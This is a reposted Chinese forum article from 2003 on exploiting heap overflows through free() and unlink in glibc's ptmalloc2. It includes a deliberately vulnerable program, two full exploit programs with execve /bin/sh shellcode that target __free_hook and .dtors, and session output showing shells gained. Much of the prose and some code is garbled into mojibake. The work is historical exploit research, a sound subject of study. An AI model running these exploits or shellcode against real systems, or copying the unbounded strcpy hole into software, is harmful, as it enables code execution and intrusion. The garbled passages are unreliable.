
[保留] ptmalloc2的堆溢出利用初探(zz)


来源 chinaunix.net 酷勤网整理

看的我直冒汗啊 :em06: ... ...


ptmalloc2的堆溢出利用初探


By backend at nsfocus.com
Date: 2003-09-16


★ 目录

　　起因
　　原因
　　分析
　　突破
　　代码
　　例外
　　结束
　　参考


★ 起因

先看一下本文的漏洞程序：

#include <stdio.h>;
#include <stdlib.h>;
#include <unistd.h>;

/*
 * Copies s2 into s1 and echoes the result.
 *
 * strcpy() takes no length, so s1 must hold strlen(s2) + 1 bytes.  The
 * only caller in this listing (main) passes a 20-byte heap buffer as s1
 * and a 100-byte one as s2, so this call is the heap overflow the
 * article demonstrates.  strcpy() is also used without <string.h>, i.e.
 * through an implicit declaration.
 *
 * Returns 0 unconditionally.
 */
int foo(char *s1,char *s2)
{
        strcpy(s1,s2);                 /* unbounded copy into the caller's buffer */
        printf("input:%s\r\n",s1);
        return 0;
}

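/*
 * Demo driver for the walkthrough: copies argv[1] into a 100-byte heap
 * buffer (p2) and then lets foo() copy it again into a 20-byte one (p1).
 *
 * Security note: the length guard below only bounds the copy into p2.
 * foo() then strcpy()s p2 into p1, which is 20 bytes, so any argument of
 * 20 to 99 bytes runs past p1 into the heap metadata that follows it
 * (the article shows it reaching p2's chunk header).  A correct program
 * would check against the smallest destination (20 - 1) or allocate p1
 * from the input length; the flaw is left in place so the listing still
 * matches the text.
 *
 * Exits with status 0 on usage or length errors, as in the original;
 * allocation failure exits with status 1.
 */
int main(int argc, char **argv)
{
        char *p1;
        char *p2;

        if (argc < 2) {
                printf("Usage:%s <string>\n", argv[0]);
                exit(0);
        }
        /* Guards p2's size (100) only -- see the header comment. */
        if (strlen(argv[1]) > 100 - 1) {
                printf("ERROR:too long\n");
                exit(0);
        }
        p1 = malloc(20);
        p2 = malloc(100);
        if (p1 == NULL || p2 == NULL) {
                printf("ERROR:out of memory\n");
                exit(1);
        }
        memset(p1, 0, 20);
        memset(p2, 0, 100);
        strcpy(p2, argv[1]);    /* bounded by the check above */
        foo(p1, p2);            /* unbounded: up to 99 bytes into 20-byte p1 */
        free(p1);
        free(p2);
        printf("END.\n");
        return 0;
}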

$ gcc -o heapvul heapvul.c

对于旧版本的glibc库，代码采用的是Doug Lea的malloc实现，因此攻击是非常简单的。
根据warning3在2001年初发表的《一种新的Heap区溢出技术分析》
（http://magazine.nsfocus.net/index.php?act=magazine&do=view&mid=847），很容
易就能写出以下攻击代码：

/* Compile: gcc -o ex1 ex1.c */

#include <stdio.h>;
#include <stdlib.h>;

#define __FREE_HOOK     0x40163700
#define VULPROG "./heapvul"

#define PREV_INUSE 0x1
#define IS_MMAPPED 0x2

char shellcode[] =
  "\xeb\x0a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

main (int argc, char **argv)
{
  unsigned int codeaddr = 0;
  char buf[40], fake_chunk[16];
  char *env[2];
  unsigned int *ptr;

  codeaddr = 0xc0000000 - 4 - (strlen (VULPROG) + 1) - (strlen (shellcode) + 1);

  env[0] = shellcode;
  env[1] = NULL;

  /* Î±ÔìÒ»¸ö¿é½á¹¹ */
  ptr = (unsigned int *) fake_chunk;
  *ptr++ = 0x11223344 & ~PREV_INUSE; /* ½«PREV_INUSEλÇåÁã */
  /* ÉèÖó¤¶ÈΪ-4,Õâ¸öÖµÓ¦µ±ÊÇ4µÄ±¶Êý */
  *ptr++ = 0xfffffffc;
  *ptr++ = __FREE_HOOK - 12 ;
  *ptr++ = codeaddr;

  bzero(buf, 40);
  memset (buf, 'A', 16); /* Ìî³äÎÞÓÃÊý¾Ý */
  memcpy (buf + 16, fake_chunk, sizeof (fake_chunk));

  execle (VULPROG, VULPROG, buf, NULL, env);

} /* End of main */

[backend@redhat72 nsfocus]$ uname -a
Linux nsfocus 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
gcc -o ex1 ex1.c
[backend@redhat72 nsfocus]$ ./ex1
input:AAAAAAAAAAAAAAAAD3"?ÿÿ?@?ÿ?
sh-2.05$

但是上面这段代码在Red Hat 8系统上不能成功：

[backend@redhat8 nsfocus]$ gcc -o ex1 ex1.c
input:AAAAAAAAAAAAAAAAD3"?ÿÿ°aB?ÿ?
Segmentation fault (core dumped)


★ 原因

这是因为在新版本的glibc库中堆内存管理采用了Wolfram Gloger的ptmalloc/ptmalloc2
代码。ptmalloc2代码是从Doug Lea的代码移植过来的，主要目的是增加对多线程（尤其
是SMP系统）环境的支持，同时进一步优化了内存分配、回收的算法。

由于在ptmalloc2中引入了fastbins机制，malloc()/free()溢出在某些条件下会受到更
多的限制，虽然作者的本意并不是针对溢出攻击。由于fastbins是单向链表数组，每一
个fastbin是一个单向链表，满足fastbins条件的内存块回收时将被放入相应的fastbin
链表中，以便在以后的
内存申请时能更快地再被分配出去，从而提高性能。因此要利用ptmalloc2的堆溢出（指
free()调用，以下同），首先必须绕过fastbins机制。

³ý´ËÖ®Í⣬free()µÄʵÏÖ´úÂëÓë¾É°æ±¾µÄÒ²Óв»Í¬£¬fake_chunksµÄ´´½¨ºÍÀûÓÃÒ²±ØÐëÓÐ
Ëù¸Ä±ä¡£ÏÂÃæ¾Í¿ªÊ¼Õë¶ÔÔ´´úÂëÖÐfree()µÄ¸÷ÖÖ¼ì²éÌõ¼þÀ´Ì½Ë÷¡£


注意！！！在继续阅读以下内容之前，请确保你已经了解warning3的《一种新的Heap区
溢出技术分析》中所涉及的知识，尤其是chunk的结构和unlink的操作，否则你也许会
觉得有点晕头转向。；）


★ 分析

要达到利用free()函数调用来攻击的目的，需要满足以下条件：

1、通过某些漏洞（例如堆溢出）来覆盖将要被free()的chunk
2、在被覆盖chunk的位置上构造fake_chunk
3、fake_chunk要确保在free()函数调用过程中运行unlink宏
4、unlink宏所操作的内存将修改程序的流程

在上面的heapvul.c程序中，由于p1指向的是malloc(40)内存，这块内存在free()回收
时由于满足fastbins条件而被直接放入某个fastbin链表中：

    /*
      If eligible, place chunk on a fastbin so it can be found
      and used quickly in malloc.
    */

    if ((unsigned long)(size) <= (unsigned long)(av->;max_fast)    // Âú×ãfastbinsÌõ¼þ

#if TRIM_FASTBINS
        /*
           If TRIM_FASTBINS set, don't place chunks
           bordering top into fastbins
        */
        && (chunk_at_offset(p, size) != av->;top)
#endif
        ) {

      set_fastchunks(av);
      fb = &(av->;fastbins[fastbin_index(size)]);                  // ´Ë´¦ÈýÐдúÂ뽫ÄÚ´æ¿é²åÈëÏàÓ¦fastbinÁ´±í
      p->;fd = *fb;
      *fb = p;
    }

而因为p1的chunk结构头部我们无法控制，所以free(p1)是利用不了了。
那么free(p2)呢？？？


★ 突破

ÓÉÓÚͨ¹ýÀûÓÃp1Ö¸ÏòµÄÄÚ´æ¿é¹ýСÇÒûÓб߽ç¼ì²é£¬ÎÒÃÇÄܹ»¸²¸Ç£¨¿ØÖÆ£©p2ËùÖ¸ÏòÄÚ
´æ¿éµÄchunk½á¹¹Í·²¿£¬Ò²¾ÍÊÇ˵free(p2)ʱµÄ²Ù×÷½«ÒÀÀµÓÚ¸²¸ÇÄÚÈÝ£¬¼´Âú×ãÁ˵Ú1¡¢
2¸öÌõ¼þ¡£Òò´ËÎÒÃÇÖ»Òª¾«ÐĹ¹Ôìfake_chunk£¬¾ÍÍêÈ«ÓпÉÄÜÂú×ãµÚ3¡¢4¸öÌõ¼þ£¬´Ó¶ø
ʹ¹¥»÷³É¹¦¡£

·ÖÎö_int_free()£¨free()µÄÕæÕýʵÏÖ´úÂ룩£º

A£©£¨´úÂë¼ûÉÏÃæ£¬£©Ê¹p2²»Âú×ãfastbinsÌõ¼þ

¡¡¡¡¼´£ºfake_chunk->;size >; 72£¨av->;max_fastȱʡֵ£©                       <--- A

B£© else if (!chunk_is_mmapped(p)) {
      nextchunk = chunk_at_offset(p, size);
      nextsize = chunksize(nextchunk);
      assert(nextsize >; 0);

¡¡¡¡¼´£ºfake_chunk->;size & IS_MMAPPED == 0¡¡£¨#define IS_MMAPPED 0x2£©    <--- B1
¡¡¡¡¡¡¡¡(fake_chunk+size)->;size >; 0                                       <--- B2

C£© ½ÓÏÂÀ´£º

      /* consolidate backward */
      if (!prev_inuse(p)) {
        prevsize = p->;prev_size;
        size += prevsize;
        p = chunk_at_offset(p, -((long) prevsize));
        unlink(p, bck, fwd);                                       /* #1 */
      }

      if (nextchunk != av->;top) {
        /* get and clear inuse bit */
        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);             <--- @_@

        /* consolidate forward */
        if (!nextinuse) {
          unlink(nextchunk, bck, fwd);                             /* #2 */
          size += nextsize;
        } else
      clear_inuse_bit_at_offset(nextchunk, 0);

        /*
          Place the chunk in unsorted chunk list. Chunks are
          not placed into regular bins until after they have
          been given one chance to be used in malloc.
        */

        bck = unsorted_chunks(av);
        fwd = bck->;fd;
        p->;bk = bck;                                               /* #3 */
        p->;fd = fwd;
        bck->;fd = p;
        fwd->;bk = p;

        set_head(p, size | PREV_INUSE);
        set_foot(p, size);

        check_free_chunk(av, p);
      }

¿ÉÒÔ¿´µ½ÓÐÁ½¸öµØ·½µ÷ÓÃÁËunlink¡£µÚÒ»¸öunlink£¨#1£©µÄÌõ¼þÊÇǰһÄÚ´æ¿éδ±»Ê¹
Óã¬ÓÉÓÚPREV_INUSE¾ÍÔÚµ±Ç°ÄÚ´æ¿éµÄsizeÖУ¬Ëƺõ×îÈÝÒ׿ØÖÆ£¬µ«ÓÉÓÚºóÃæ»¹ÓÐÒ»¶Î
´úÂ루#3£©£¬Õâ¶Î´úÂ뻹»áÔÙÒ»´ÎÐÞ¸ÄÒѾ­±»ÎÒÃÇ£¨Í¨¹ýunlink²Ù×÷£©¸ÄдµÄÄڴ棨
×¢£ºÔÚÕâÀïÖ÷ÒªÊÇshellcodeµÄÈë¿Ú»á±»bck¸²¸Ç£©¡£Òò´ËÎÒÃǰÑÄ¿±êתÏòµÚ¶þ¸öunlink
£¨#2£©£¬ËüÒªÇóÂú×ãÁ½¸öÌõ¼þ£º

¡¡¡¡nextchunk²»ÊÇtop¿é£¨¶Ñ±ß½ç£©£¬Õâ¸ö¾ø´ó¶àÊýÇé¿ö϶¼·ûºÏ£»

¡¡¡¡ÏÂÒ»¸öchunk¿éδ±»Ê¹Ó㬼´ÔÙÏÂÒ»chunk¿éµÄPREV_INUSEλΪ0¡£             <-- C

ÖÁ´Ë£¬Èç¹ûÉÏÊöÌõ¼þ¶¼ÄÜÂú×㣬Ôò½«µ÷Óõ½unlink£¬´Ó¶øÐÞ¸ÄÎÒÃÇÖ¸¶¨µÄÄڴ棨עÒ⣬
µØÖ·ÓÉÏÂÒ»¸öchunk¿éµÄfd/bkÖ¸Õë¾ö¶¨£¡£©¡£
ÏÂÃæ¸Ã×öµÄ¾ÍÊÇÒ»²½²½µØÈ·¶¨ÈçºÎ¹¹Ôì¸÷¸öfake_chunkÁË£º

Ê×ÏÈ£¬ËùÓеÄfake_chunk¶¼²»Äܺ¬ÓÐÁã×Ö·û£¬·ñÔò»áÓöµ½×Ö·û´®½Ø¶ÏÎÊÌ⡣ͬʱËùÓÐ
fake_chunkµÄIS_MMAPPEDλ¾ùΪÁã¡££¨Âú×ãÌõ¼þB1£©

£¨fake_chunk1¼´free(p2)ʱÊ×Ïȼì²éµÄchunk£¬Æä×÷ÓÃÊÇÈÃ_int_free()¼ÆËã³ö
fake_chunk2µÄλÖᣣ©
µÚÒ»£¬fake_chunk1->;pre_size£¨PSZ1£©£¬ÔÝʱûÓÐÒªÇ󣨵±È»×îºÃ¶ÔÆë£©¡£
µÚ¶þ£¬fake_chunk1->;size£¨SZ1£©Òª´óÓÚ72£¨max_fast£©£»Í¬Ê±PREV_INUSEλÖÃ1£¬ÒÔ
¡¡¡¡¡¡Ê¹#1µÄunlink²»±»´¥·¢£¨ÕâÑùÎÒÃǾͲ»Óÿ¼ÂÇPSZ2ÁË£»£©£©¡£
µÚÈý£¬fake_chunk1->;fd£¨FD1£©£¬ÔÝʱûÓÐÒªÇ󣨵±È»×îºÃ¶ÔÆë£©¡£
µÚËÄ£¬fake_chunk1->;bk£¨BK1£©£¬Í¬FD1¡£

£¨fake_chunk2µÄ×÷ÓÃÖÁ¹ØÖØÒª£¬Ëü½«Ê¹unlink¡°ºÏ·¨¡±µØÊÍ·Å×Ô¼º£¬¼´ÐÞ¸ÄÄڴ棡£©
µÚÎ壬fake_chunk2->;pre_size£¨PSZ2£©£¬Í¬PSZ1¡£
µÚÁù£¬fake_chunk2->;size£¨SZ2£©£¬ÒªÇóSZ>;0ÇÒ(fake_chunk2+SZ2)->;size & PREV_SIZE
¡¡¡¡¡¡ÎªÁã¡£
µÚÆß£¬fake_chunk2->;fd£¨FD2£©£¬Ö¸ÏòÒªÐÞ¸ÄÄÚ´æµÄµØÖ·-12¡£
µÚ°Ë£¬fake_chunk2->;bk£¨BK2£©£¬Ö¸Ïòshellcode¡£

½Ó×Å£¬ÎÒÃÇÒª½øÒ»²½È·¶¨¸÷¸ö×ֶεÄÊýÖµ£º

¶ÔÓÚPSZ1ºÍPSZ2£¬È¡ÖµÈ磺0x11223344

¶ÔÓÚSZ1£¬ÓÉÓÚfake_chunk2µÄ¶¨Î»ÒÀÀµÓÚSZ1£¬
¡¡¡¡Èç¹ûÈ¡ÕýÖµ£¬»áºÜ´ó£¨ÒòΪ¸÷×Ö½Ú²»ÄÜΪÁ㣩£¬¿ÉÒÔÈ¡Êʵ±ÖµÊ¹fake_chunk1+SZ1
λÓÚ¶ÑÕ»µÄ»·¾³±äÁ¿ÖУ¬È»ºó°Ñfake_chunk2ͨ¹ý»·¾³±äÁ¿Êä³ö¡£ÕâÑùÓÐÒ»¸öȱµãÊDz»
ÈÝÒ×¶¨Î»£¬ÒòΪ²»Äܾ«È·¶¨Î»fake_chunk1µØÖ·£¬Ö»ÄÜͨ¹ý²Â²â¡£
¡¡¡¡Èç¹ûÈ¡¸ºÖµÄØ£¿£¿£¿ÎÒÃÇ¿ÉÒԻعýÍ·À´ÔÙ¿´¿´_int_free()µÄ´úÂ룬¿ÉÒÔ¾ªÆæµØ·¢
ÏÖ¾ÓÈ»ÊÇÔÊÐíµÄ£¡£¡£¡ºÇºÇ£¬ÕâÑù¾ÍºÃ°ìÁË¡£ÎÒÃÇ¿ÉÒÔ°Ñfake_chunk2·Åµ½fake_chunk1
Ç°Ãæ£¡SZ1ȡֵ0xfffffff0£¨-16£©¡££¨Âú×ãÌõ¼þA£©

¶ÔÓÚFD1ºÍBK1£¬È¡ÖµÈ磺0x08080808

¶ÔÓÚSZ2£¬Õ§¿´Ö®Ï¿ÉÒÔÈÎÒâȡֵ£¬Ö»Òª(fake_chunk2+SZ2)->;size & PREV_SIZEΪÁã¼´
¿É£¨Å¼µ±Ê±µ÷ÊÔʱÖ÷Òª¾Í¿¨ÔÚÕâÀ£¬Æäʵ²»È»¡£ÔÚ@_@´¦µÄ´úÂëÊǶÁÄÚ´æ²Ù×÷£¬Èç¹û
ÄÚ´æÒ³Ãæ²»´æÔÚ£¬»áµ¼ÖÂȱҳÒì³£¡£Òò´ËÎÒ¾ö¶¨ÈÃfake_chunk2+SZ2Ö¸ÏòÒ»¸ö±ØÈ»´æÔÚ
ÄÚ´æÒ³±íµÄ¿Õ¼ä£­£­Óû§¶ÑÕ»µÄ×î¸ßÒ»Ò³£¨¼´0xbffff000-0xbfffffff£©£¬¼´SZȡֵ
(0xbffff800 - bss_addr)¡££¨Âú×ãÌõ¼þB2ºÍÌõ¼þC£©

¶ÔÓÚFD2£¬ÓÉÓÚ¿ÉÒÔÀûÓõÄÄÚ´æµØÖ·ºÜ¶à£¬ÎÒÕâÀïÑ¡ÔñµÄÊǾ²Ì¬È·¶¨µÄ.dtors¶Î£¬¼´FD
ȡֵ(dtors_addr + 4 - 12)¡£

¶ÔÓÚBD2£¬Óû·¾³±äÁ¿Êä³öshellcodeÊÇ×îÈÝÒ×È·¶¨µØÖ·µÄ·½·¨Ö®Ò»¡£

ÏÖÔÚ£¬ÎÒÃÇ¿ÉÒÔ»­³öαÔìǰºóµÄÄÚ´æ·Ö²¼Ê¾ÒâͼÁË£º

+->; ¿é1                                   +->; ¿é2                    
|                                         |
+----------------+------------------------+----------------------------+
|prev_size| size |        16bytes         |prev_size2| size2 |ÈÎÒâÊý¾Ý
+----------------+------------------------+----------------------------+


+----------------+------------------------+----------------------------+
|prev_size| size | PSZ2 | SZ2 | FD2 | BK2 | PSZ1 | SZ1 | FD1 | BK1 | 
+----------------+------------------------+----------------------------+
                 |                        |
                 +->; fake_chunk2          +->; fake_chunk1


★ 溢出代码

/* Concept-of-proof exploit for free() @ Wolfram Gloger's ptmalloc2
*
*  By backend at nsfocus.com (http://www.nsfocus.com) 
*  Date: 2003-09-15
*
*  Compile: gcc -o ex2 ex2.c -lbfd
*/
#include <stdio.h>;
#include <stdlib.h>;
#include <bfd.h>;
#include <strings.h>;
#include <linux/elf.h>;

#define VULPROG "./heapvul"

#define PREV_INUSE 0x1
#define IS_MMAPPED 0x2

#define bfd_error(s)    { bfd_perror(s); exit(-1); }

unsigned int bss_addr, dtors_addr;

/*
 * Reads the load addresses (VMA) of the .bss and .dtors sections of
 * VULPROG with libbfd and stores them in the file-scope globals
 * bss_addr and dtors_addr.
 *
 * Every libbfd failure goes through the bfd_error macro, which prints
 * the error and exits the process, so no cleanup of abfd is needed on
 * those branches.  The VMA is truncated to unsigned int, which assumes
 * a 32-bit ELF target -- TODO confirm before reuse elsewhere.
 */
void GetBfdInfo ()
{
        bfd                     *abfd;
        asection        *asec;

        bfd_init ();

        abfd = bfd_openr (VULPROG, NULL);
        if (!abfd) bfd_error("openr");

        if (!bfd_check_format (abfd, bfd_object))
                bfd_error("object format");

        /* section lookup returns NULL when the section is absent */
        asec = bfd_get_section_by_name (abfd, ".bss");
        if (!asec) bfd_error(".bss section");
        bss_addr = (unsigned int)(asec->;vma);

        asec = bfd_get_section_by_name (abfd, ".dtors");
        if (!asec) bfd_error(".dtors section");
        dtors_addr = (unsigned int)(asec->;vma);

        bfd_close (abfd);
}

char shellcode[] =
  "\xeb\x0a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

main (int argc, char **argv)
{
  unsigned int codeaddr = 0;
  char buf[40], fake_chunks[40];
  char *env[2];
  unsigned int *ptr;

  codeaddr = 0xc0000000 - 4 - (strlen (VULPROG) + 1) - (strlen (shellcode) + 1);

  env[0] = shellcode;
  env[1] = NULL;

  GetBfdInfo ();

  bzero(fake_chunks, 40)
  ptr = (unsigned int *)fake_chunks;
  *ptr++ = 0x11223344;    /* garbage */
  *ptr++ = (0xbffff800 - bss_addr) & ~(IS_MMAPPED | PREV_INUSE);
  *ptr++ = dtors_addr + 4 - 12;
  *ptr++ = codeaddr;
  *ptr++ = 0x11223344;    /* garbage */
  *ptr++ = -16 | PREV_INUSE & ~IS_MMAPPED;
  /* garbage
  *ptr++ = 0x08080808;
  *ptr++ = 0x08080808;
  */
  
  bzero(buf, 40);
  memcpy (buf, fake_chunks, sizeof (fake_chunks));

  execle (VULPROG, VULPROG, buf, NULL, env);

} /* End of main */

[backend@redhat8 nsfocus]$ gcc -o ex2 ex2.c -lbfd
[backend@redhat8 nsfocus]$ ./ex2
input:D3"`û·¨¸ÿÿŸm3"?ÿÿ
END.
sh-2.05b$


★ 例外

  ptr = (unsigned int *)fake_chunks;
  *ptr++ = 0x11223344;
  *ptr++ = (0xbffff800 - bss_addr) & ~(IS_MMAPPED | PREV_INUSE);
  *ptr++ = dtors_addr + 4 - 12;
  *ptr++ = codeaddr;
  *ptr++ = 0x11223344;
  *ptr++ = -16 | PREV_INUSE & ~IS_MMAPPED;

上面给出的代码有几个可能导致失败的地方－－

bss_addr！！！
dtors_addr£¡£¡£¡
codeaddr£¡£¡£¡

ÆäÖÐǰÁ½¸öÖµÊDZàÒëºó¾²Ì¬£¨Ö±½Ó´ÓÎļþÍ·¶ÁÈ¡£©£¬¶øcodeaddr¶ÔÓڹ̶¨ÏµÍ³À´ËµÒ²Êǹ̶¨²»±äµÄ¡£
µ±ÕâÈý¸öµØÖ·ÖµÖÐÖ»ÒªÔÚ¼ÆËã½á¹ûºó´æÔÚÒ»¸ö00£¨¼´Áã×Ö·û£©£¬¾Í»áµ¼ÖÂ×Ö·û´®¿½±´½Ø¶ÏÎÊÌ⣡£¡£¡

ÔÚÎÒµÄRH8²âÊÔ»úÉÏ£¬Î´¼Ómemset(p2,0,100)ʱ£º
bss_addr at: 0x8049734
dtors_addr at 0x80496f8
fake_chunks len: 24
Òç³ö³É¹¦¡£

µ±¼ÓÉÏmemset(p2,0,100)ʱ£º
bss_addr at: 0x8049744
dtors_addr at 0x8049708
fake_chunks len: 8
Òç³öʧ°Ü£¡

¿´µ½ÁËÂð£¿dtors_addrµÄ×îµÍ×Ö½ÚΪ08£¬dtors_addr + 4 - 12 = 0x8049700£¬ËùÒÔµ¼ÖÂ
fake_chunksµÄ×Ö·û´®³¤¶ÈÖ»ÓÐ8ÁË£¡£¡£¡

ÑéÖ¤£ºÐÞ¸ÄÈÎÒâÎÞ¹ØÖ¸ÁÀýÈçɾ³ýprinf()¡¢Ôö¼Óprintf()£©¡£ÀýÈçÔÚÎҵIJâÊÔ»úÉϰÑ
printf("END.\n");
¸ÄΪ£¨»òɾ³ýÒ²ÐУ©£º
printf("END.");
printf("\n");
ºó£¬ÖرàÒëÔËÐнá¹û£º
bss_addr at: 0x8049754
dtors_addr at 0x8049718
fake_chunks len: 24
input:D3"¬`û·?ÿ¿D3"?ÿÿ
END.
sh-2.05b$

ç¹ûÎÞ·¨ÐÞ¸ÄÔ´´úÂëµÄÄØ£¿Ò²»¹ÓкܶàÖÖ¿ÉÑ¡·½°¸£¬ÀýÈçÐÞ¸ÄGOT¡¢Ð޸ĺ¯ÊýÖ¸Õë¡¢ÐÞ¸Ä
EBP¡¢Ð޸ĺ¯Êý·µ»ØµØÖ·£¬µÈµÈ¡£µ±È»ÄѶȿÉÄܾͲ»Ò»¶¨Ò»ÑùÁË¡£


★ 结束语

上面简单介绍了在新版本glibc下如何通过free()调用来利用堆溢出。可以看到由于引
入了fastbins机制，malloc/free等调用会随具体情况不同而可能略有差异。例如，
free()一块large chunk与一块small chunk是不一样的，即使都是small chunk，还有
是否属于fastbins之分，等等。而对于exploit爱好者，设计构造fake_chunks也很有
乐趣。如何在把堆放到栈中？；）如何伪造chunk结构？覆盖哪些地址？如何调试？
…………这些问题就留给感兴趣的读者吧。

在即将写完这篇东东之际，发现bkbll在2003年9月初也发表了一篇研究相同问题的文章
《一种小堆(heap)溢出的另类利用方法》
（http://www.nsfocus.net/index.php?act=sec_doc&do=view&doc_id=867）。不妨对
照着研究，也许会有新的发现。



★ 参考文献

[1] warning3, <<一种新的Heap区溢出技术分析>>
    http://magazine.nsfocus.net/index.php?act=magazine&do=view&mid=847

[2] Doug Lea, <<A Memory Allocator>>
    http://gee.cs.oswego.edu/dl/html/malloc.html

[3] Wolfram Gloger, ptmalloc2 source code
    http://www.malloc.de/malloc/ptmalloc.tar.gz



 watercloud 回复于：2004-07-14 09:33:53

ÕâÀïÒÔǰÏêϸµÄÌÖÂÛ¹ý£¬¿ÉÒԲο¼£º

https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28184&page=all

https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28202&page=all


 watercloud 回复于：2004-07-14 09:38:12

还有一篇相关文章：
http://www.cnhonker.com/index.php?module=articles&act=view&type=6&id=76


 watercloud 回复于：2004-07-15 20:37:42

参考链接写错了 :)
刚刚改正 :- )

https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28184&page=all 

https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28202&page=all


 ayazero 回复于：2004-07-16 17:25:46

可怜现在的时间越来越少~




原文链接：http://bbs.chinaunix.net/viewthread.php?tid=365489
转载请注明作者名及原文出处


